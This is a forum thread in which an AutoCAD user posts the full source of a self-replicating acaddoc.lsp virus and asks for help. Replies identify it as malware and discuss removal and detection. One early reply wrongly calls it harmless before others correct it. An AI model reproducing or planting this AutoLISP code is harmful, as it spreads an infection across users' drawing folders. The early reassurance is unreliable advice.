Visual LISP, AutoLISP and General Customization
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

Acaddoc.lsp virus?

14 REPLIES 14
Reply
Message 1 of 15
robertz
22674 Views, 14 Replies

Acaddoc.lsp virus?

I'm trying to determine whether the Acaddoc.lsp files that I'm finding in many of our working folders are malicious.  Nothing appears to be going wrong with opening files, working on them, saving them, etc., but I'm seeing the LSP files appearing in many of our folders and I'm not sure if I should take action to remove/cleanse them.  Please let me know if you have any advice about this.  We're using AutoCAD MEP.  Here is what I'm seeing inside the LSP file when I use Notepad to look at it:

 

(setvar "LAYEREVAL" 0)
(setvar "LAYERNOTIFY" 0)
(defun-q s::startup
(/ basepath
baseacad
acaddocpath
r-acaddoc
w-basepath
rl-acaddoc
acaddoclsp
c-acaddocname
c-acaddocpath
c-acaddoc
)
(setq basepath
(findfile "base.dcl")
)
(setq basepath
(substr basepath
1 (- (strlen basepath) 8)
)
)
(setq baseacad (strcat basepath "acaddoc.lsp"))

(setq acaddocpath
(findfile "acaddoc.lsp")
)
(setq acaddocpath
(substr acaddocpath
1 (- (strlen acaddocpath) 11)
)
)
(setq acaddoclsp
(strcat acaddocpath "acaddoc.lsp"))


(setq c-acaddocname
(getvar "dwgname")
)
(setq c-acaddocpath
(findfile c-acaddocname)
)
(setq c-acaddocpath
(substr c-acaddocpath
1 (- (strlen c-acaddocpath) (strlen c-acaddocname))
)
)
(setq c-acaddoc
(strcat c-acaddocpath "acaddoc.lsp")
)
(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath)
)
(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open baseacad "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

)

(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open c-acaddoc "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

)
)
(princ)
)
(setvar "cmdecho" 0)(terpri)(command ".-scalelistedit")(command "reset")(command "yes")(command
"exit")
(setvar "LAYEREVAL" 0)
(setvar "LAYERNOTIFY" 0)

14 REPLIES 14
Message 2 of 15
pendean
in reply to: robertz
Message 3 of 15
skintsubby
in reply to: pendean

And this helps to explain a bit about it and what Autdesk have done to stop it.

 

http://adndevblog.typepad.com/autocad/2013/07/all-you-need-to-know-about-autocad-secureload-au.html:...

Message 4 of 15
Anonymous
in reply to: skintsubby

Aw,

the link skintsubby posted does not work...

Message 5 of 15
skintsubby
in reply to: Anonymous
Message 6 of 15
Anonymous
in reply to: robertz

., but I'm seeing the LSP files appearing in many of our folders and I'm not sure if I should take action to remove/cleanse them.  

 

 

 

Some portions of the code in that startup routine don't appear as if they're doing anything malicious.

But they are employing the

(read-file)

and (write-file) functions....this conditional here...

 

(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath)
)
(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open baseacad "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

 

May be what's causing the text files to appear on your machines, looks to me as if it's storing some paths (that may be different for each user executing this script) and then writing some text to those files before closing them.

I wouldn't worry too much, and if you're able to locate and open one of these text files, if it is NOT required you may try to comment out the appropriate lines from the script in order to have it not read/write anymore.

You'd do that with the semicolon ";" in front of each of the lines....

To clean your system you could do a search for the .txt filenames and remove them, then comment out the lines that are creating them....

It doesn't appear as if that script is doing anything major but you may want to get confirmation of this...

I can't tell exactly what it does and I may be incorrect about it not being malicious, but from looking at the functions being employed, nothing seems too harmful at all. No windows registry calls are being made nor is it compiled...I wouldn't worry too much about it, if the files it's placing on your system is getting annoying then just force it to stop writing them....

Also the environment settings...the 2 setvars being operated at the beginning and end are setting to the same value without storing the users previous settings nor making calls to layer anything during the routine. This likely seems like one users preferences and a method for storing some information from the drawing (my best guess at what the intention of this code is).

Just know, that the files are appearing because the code is telling them to make them, and that it's easily removed. Nothing too vital is occuring but you always want to use ";" in favor of outright deleting because you can remove the ; if anything goes unexpectedly.

Hope this helps some

Message 7 of 15
dgorsman
in reply to: Anonymous

This is standard malicious code procedure.  It opens the auto-running AutoCAD code files and appends additional code so that it replicates.  NOTHING SHOULD BE READING OR WRITING AUTOMATICALLY TO ACAD.LSP OR ACADDOC.LSP.

 

For the OP: yes, you have an infection.  It needs to be fixed on ALL AutoCAD computers in your organization.  NO EXCEPTIONS OR IT WILL KEEP COMING BACK.

----------------------------------
If you are going to fly by the seat of your pants, expect friction burns.
"I don't know" is the beginning of knowledge, not the end.


Message 8 of 15
Anonymous
in reply to: robertz

learn something new...every day
Message 9 of 15
BlackBox_
in reply to: dgorsman


@dgorsman wrote:

This is standard malicious code procedure.  It opens the auto-running AutoCAD code files and appends additional code so that it replicates.  NOTHING SHOULD BE READING OR WRITING AUTOMATICALLY TO ACAD.LSP OR ACADDOC.LSP.

 

For the OP: yes, you have an infection.  It needs to be fixed on ALL AutoCAD computers in your organization.  NO EXCEPTIONS OR IT WILL KEEP COMING BACK.


As a result of this very issue about a year ago, I developed a .NET plug-in which loads user-defined 'virus definitions' from an XML file, which are then used iteratively to search SFSP, etc. for prior to any Acad* file(s) being loaded in the startup sequence. If any are found, the file is rendered inert (by renaming in place), and then another search for same 'definition' is performed (to ensure no duplicates are left behind for completeness). Any definition found is also reported at the command line, including the file's owner, so as to help track down the cause.

 

I submitted this app to Exchange during AutoCAD 2014 Beta, only for app review to be held up due to Autodesk's Security protocol being rolled out (which I was unaware of prior to Beta).

 

My app reviewed well (when they got to it), but they wanted me to remove user-defined definitions, which I categorically rejected. We do not use compiled LISP code files, so I could add a blanket *.FAS, and *.VLX definition, whereas other users may not... I wanted to give the user flexibility.

 

They also wanted me to first compile a list of all 'virus' file names, hard-code them into the app, and then host them on my website, so as to use the new JavaScript API to perform live updates... It took multiple tries to get them to understand that it would be a bad thing to hard-code Acad.[lsp[fas[vlx]]], and AcadDoc.[lsp[fas[vlx]]], etc. and block them without user's ability to override.

 

Lastly, they didn't care for my app being named 'Antivirus for AutoCAD' (like I said, I was unaware of AutoCAD Security at the time), so I chose to rename it as 'Blacklist for AutoCAD'... I use the app daily for my work, but after the frustration experienced on my first app submission, I've let it sit... it needs some TLC to implement a UI so user doesn't have to manually edit the XML, etc..

 

 

 

This post reminds me that I should get this finished, as it would help several folks... Especially those using 2012 and earlier, as I do.



"How we think determines what we do, and what we do determines what we get."

Message 10 of 15
Anonymous
in reply to: BlackBox_

Interesting.

I'm glad this came up and will be careful to not employ anything that reads and writes to the acad* lsp files as dgorsman stated as a result of this newfound knowledge. Sorry for my incorrect info if the OP read it before dgorsmans and BBs, I assumed that malicious code would be compiled and not employ innocuous looking statements, but the word 'replicate' makes it easily understandible as to where the maliciousness comes from

Message 11 of 15
dgorsman
in reply to: Anonymous

The source of the virus is usually piggy backing in on an infected file.  Sometimes it comes in via one of those modified ACAD.LSP or ACADDOC.LSP files along with drawing files, where the sender is unaware of what they do.  From there it tries to modify the appropriate file(s) to add instructions to create itself elsewhere.  Some of them use ASCII character codes to try to mask what is being added. 

 

In all cases I would be wary of something that tries to dynamically open LISP files and write more content to them.  The general concept is kind of cool - self-modifying code can do some very neat things.  When its done to files that are loaded and executed automatically that waves a big red flag.

----------------------------------
If you are going to fly by the seat of your pants, expect friction burns.
"I don't know" is the beginning of knowledge, not the end.


Message 12 of 15
robertz
in reply to: robertz

I appreciate everyone's input.  I'd like to clean the infection from our system but I'm having trouble finding a reliable procedure for it.  I did check out the links provided so far, but it seems like the only actual infection-cleaning procedures they offer are related to a .VLX infection (which doesn't seem to match my circumstances) or relies on security features offered only in 2013 or 2014 (which won't help me since we're running older versions of AutoCAD MEP on most of our workstations).  There is a potential solution on a random blog that I stumbled across when searching for fixes (http://metinsaylan.com/819/how-to-clean-acaddoc-lsp-virus-from-your-pc/), but it uses a self-executable that I'm not sure I should trust.  If anyone has used that self-executable and knows it's dependable, please let me know.  Can anyone point me to a procedure for getting rid of this self-spreading acaddoc.lsp?  I assume there will be more to it than just deleting acaddoc.lsp from our working directories and invdividual CAD workstations.

 

By the way, if it helps to clarify my specific situation, the only symptoms thus far is the replicating acaddoc.lsp file in every folder where we open a CAD drawing.  Other than that, we have seen no malicious effects such as files that won't open, bizarre error messages, etc.  I look forward to getting rid of this before worse symptoms arise.  Thanks, everyone, for all of your helpful contributions so far.

Message 13 of 15
Anonymous
in reply to: robertz

well you could do a hard search in your computer drive for ".lsp" and then do a find in each file found for one of the strings found in your malicious code above. quarantine each of these files . remove them....make sure the ones that are being used by autocad are replaced with non infectious lisp and see if youre able to run autocad without it spreading?
just a suggestion....obv you may learn more pertinent information from more experienced users here such as dgorsman but if youre at a loss as to what to do.....I'd start there.
establish controls....keep the search window open and pay attnt to the quantity of lisp files returned by the search....check to see how many additional lisp files are created if you run autocad ...remove infected code from infected lsp files....rinse and repeat..that may get you in a better spot .
hth
Message 14 of 15
stevor
in reply to: robertz

My guess is that any VLX or FAS file can contain malware; so trust what you make, and know that the Autodesk ones are real. Also, there is a method of loading a virus from a LSP; as done by the BURST virus, of various names and forms, where a list of two integer numbers are used to load the virus code. One example: http://usa.autodesk.com/adsk/servlet/ps/dl/item?siteID=123112&id=13717811&linkID=9240617
S
Message 15 of 15
dgorsman
in reply to: Anonymous

Not just LSP files; there's also VLX, FAS, and MNL.  In fact, the extension doesn't matter much - you can rename a LSP file as .XXX and it will still load.  Start with everything named "acad" - those are typically the ones automatically loaded at start-up.  Investigate any add-ins, downloads, or other "stuff" downloaded by users who think they are helping.

 

Automated removal of these files is tricky.  Unless you do it absolutely right theres a false sense of security since it can miss something it isn't looking for.  Best bet, find the original source and apply steps to deal with that rather than the symptoms.

----------------------------------
If you are going to fly by the seat of your pants, expect friction burns.
"I don't know" is the beginning of knowledge, not the end.


Can't find what you're looking for? Ask the community or share your knowledge.

Post to forums  

Technology Administrators


Autodesk Design & Make Report